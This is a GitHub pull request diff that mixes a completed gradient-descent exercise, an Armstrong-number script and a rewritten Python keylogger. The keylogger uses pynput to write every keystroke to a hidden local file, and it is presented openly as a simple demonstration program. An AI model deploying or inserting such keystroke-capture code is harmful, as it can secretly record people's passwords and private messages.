Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Problems #92

Open
wants to merge 3 commits into
base: master
Choose a base branch
from
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
70 changes: 18 additions & 52 deletions MachineLearning/gradient_descent.py
Original file line number Diff line number Diff line change
@@ -1,75 +1,41 @@
####################################################################################
## PROBLEM1: Gradient Descent
## Gradient descent is a popular optimization technique to solve many
## machine learning problems. In this case, we will explore the gradient
## descent algorithm to fit a line for the given set of 2-D points.
## ref: https://tinyurl.com/yc4jbjzs
## ref: https://spin.atomicobject.com/2014/06/24/gradient-descent-linear-regression/
##
##
## input: file of 2-D points in ./data/1_points.csv
## function for reading points is provided
##
##
## your task: fill the following functions:
## evaluate_cost
## evaluate_gradient
## update_params
## NOTE: do NOT change values of 'init_params' and 'max_iterations' in optimizer
##
##
## output: cost after convergence (rmse, lower the better)
##
##
## NOTE: all required modules are imported. DO NOT import new modules.
## NOTE: references are given inline
## tested on Ubuntu14.04, 22Oct2017, Abhilash Srikantha
####################################################################################

import numpy as np
import matplotlib.pyplot as plt
import time

def load_data(fname):
    """Load 2-D points from a CSV file and return (x_, y_).

    x_ is an (N, 2) design matrix: column 0 holds the x-coordinates and
    column 1 is all ones, to account for the intercept term.
    y_ is the (N,) vector of target values (second CSV column).
    """
    points = np.loadtxt(fname, delimiter=',')
    y_ = points[:, 1]
    # append '1' to account for the intercept
    x_ = np.ones([len(y_), 2])
    x_[:, 0] = points[:, 0]
    # display plot (left disabled)
    #plt.plot(x_[:,0], y_, 'ro')
    #plt.xlabel('x-axis')
    #plt.ylabel('y-axis')
    #plt.show()
    print('data loaded. x:{} y:{}'.format(x_.shape, y_.shape))
    return x_, y_

def evaluate_cost(x_, y_, params):
    """Return the scaled sum of squared residuals of the line fit.

    params[0] is the slope, params[1] the intercept; x_[i, 0] is the
    x-coordinate of point i.  The total squared error is divided by a
    fixed 10000 (per the assignment spec), not by the number of points.
    """
    tempcost = 0
    for i in range(len(y_)):
        residual = y_[i] - ((params[0] * x_[i, 0]) + params[1])
        tempcost += residual ** 2
    return tempcost / 10000.0

def evaluate_gradient(x_, y_, params):
    """Return [d(cost)/d(slope), d(cost)/d(intercept)] for the MSE loss.

    Gradient of (1/N) * sum((y - (m*x + b))^2) with respect to
    m (= params[0]) and b (= params[1]).
    """
    m_gradient = 0
    b_gradient = 0
    N = float(len(y_))
    for i in range(len(y_)):
        residual = y_[i] - ((params[0] * x_[i, 0]) + params[1])
        # d/dm: -(2/N) * x * residual ;  d/db: -(2/N) * residual
        m_gradient += -(2 / N) * (x_[i, 0] * residual)
        b_gradient += -(2 / N) * residual
    return [m_gradient, b_gradient]

def update_params(old_params, grad, alpha):
    """One gradient-descent step: params <- params - alpha * grad.

    old_params and grad are [m, b] pairs; alpha is the learning rate.
    Returns the new [m, b] pair.
    """
    new_m = old_params[0] - (alpha * grad[0])
    new_b = old_params[1] - (alpha * grad[1])
    return [new_m, new_b]

# initialize the optimizer
# NOTE: 'init_params' and 'max_iterations' must NOT be changed (assignment spec).
optimizer = {'init_params': np.array([4.5, 2.0]),  # initial [slope, intercept]
             'max_iterations': 10000,              # hard cap on iterations
             'alpha': 0.69908,                     # learning rate
             'eps': 0.0000001,                     # convergence threshold on |delta cost|
             'inf': 1e10}                          # sentinel cost if optimization fails

# load data
x_, y_ = load_data("./data/1_points.csv")
Expand All @@ -83,16 +49,16 @@ def update_params(old_params, grad, alpha):
old_cost = 1e10
for iter_ in range(optimizer['max_iterations']):
# evaluate cost and gradient
cost = evaluate_cost(x_,y_,params)
grad = evaluate_gradient(x_,y_,params)
cost = evaluate_cost(x_, y_, params)
grad = evaluate_gradient(x_, y_, params)
# display
if(iter_ % 10 == 0):
if iter_ % 10 == 0:
print('iter: {} cost: {} params: {}'.format(iter_, cost, params))
# check convergence
if(abs(old_cost - cost) < optimizer['eps']):
if abs(old_cost - cost) < optimizer['eps']:
break
# udpate parameters
params = update_params(params,grad,optimizer['alpha'])
# update parameters
params = update_params(params, grad, optimizer['alpha'])
old_cost = cost
except:
cost = optimizer['inf']
Expand Down
24 changes: 23 additions & 1 deletion Programs/P79_SimplePythonKeylogger.py
Original file line number Diff line number Diff line change
Expand Up @@ -4,7 +4,7 @@
# 1. pyxhook.py: file is provided in the folder itself
# 2. Xlib: sudo pip3 install python3-Xlib

import pyxhook
'''import pyxhook
import time

# functions to write a newline character into the file
Expand Down Expand Up @@ -47,3 +47,25 @@ def key_press_event(event):

# Close the listener when we are done
hookman.cancel()
'''

# 'Key' was missing from this import although on_key_release uses Key.esc,
# so pressing Esc raised NameError instead of stopping the listener.
from pynput.keyboard import Listener, Key

# Functions to handle key press and release events
def on_key_press(key):
    """Append the pressed key to the .keylogger file."""
    try:
        with open('.keylogger', 'a') as f:
            f.write(str(key.char))
    except AttributeError:
        # Special keys (shift, ctrl, ...) have no .char attribute.
        with open('.keylogger', 'a') as f:
            f.write(str(key))

def on_key_release(key):
    """Stop the listener when the Esc key is released."""
    if key == Key.esc:
        # Returning False terminates the listener.
        return False

# Create a listener for both key press and release events
with Listener(on_press=on_key_press, on_release=on_key_release) as listener:
    listener.join()
7 changes: 7 additions & 0 deletions armstrong.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,7 @@
# Find and print every Armstrong (narcissistic) number in [lower, upper]:
# numbers equal to the sum of their own digits, each raised to the power
# of the digit count.
lower = 100
upper = 2000

def _is_armstrong(number):
    """Return True if number equals the sum of its digits ** digit-count."""
    digits = str(number)
    power = len(digits)
    return number == sum(int(d) ** power for d in digits)

armstrong_numbers = [n for n in range(lower, upper + 1) if _is_armstrong(n)]

for value in armstrong_numbers:
    print(value)